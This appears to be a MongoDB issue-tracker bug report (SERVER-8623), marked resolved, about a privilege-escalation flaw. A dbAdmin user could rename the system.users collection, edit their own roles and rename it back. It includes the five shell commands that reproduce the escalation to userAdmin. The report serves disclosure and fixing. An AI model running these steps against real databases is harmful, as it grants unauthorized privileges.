Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-8623

Unauthorized users are allowed to rename to and from system.users

    • Type: Icon: Bug Bug
    • Resolution: Done
    • Priority: Icon: Major - P3 Major - P3
    • 2.4.0-rc1
    • Affects Version/s: 2.4.0-rc0
    • Component/s: Security
    • None
    • ALL
    • Hide

      >db.auth('hacker', 'hack') //assume you have readWrite and dbAdmin rights
      >db.system.users.renameCollection('users')
      >db.users.update(

      { user : 'hacker' }

      , { $set : { roles : ['userAdmin']}})
      >db.users.renameCollection('system.users')
      >db.auth('hacker', 'hack') //now you have userAdmin rights

      Show
      >db.auth('hacker', 'hack') //assume you have readWrite and dbAdmin rights >db.system.users.renameCollection('users') >db.users.update( { user : 'hacker' } , { $set : { roles : ['userAdmin'] }}) >db.users.renameCollection('system.users') >db.auth('hacker', 'hack') //now you have userAdmin rights

      A user with dbAdmin access is allowed to rename the system.users collection. They are also allowed to rename any collection to system.users (if there is not currently a collection there). This makes it possible to change user permissions without having userAdmin rights.

            Assignee:
            spencer@mongodb.com Spencer Brody (Inactive)
            Reporter:
            andrew.emil@10gen.com Andrew Emil (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

              Created:
              Updated:
              Resolved: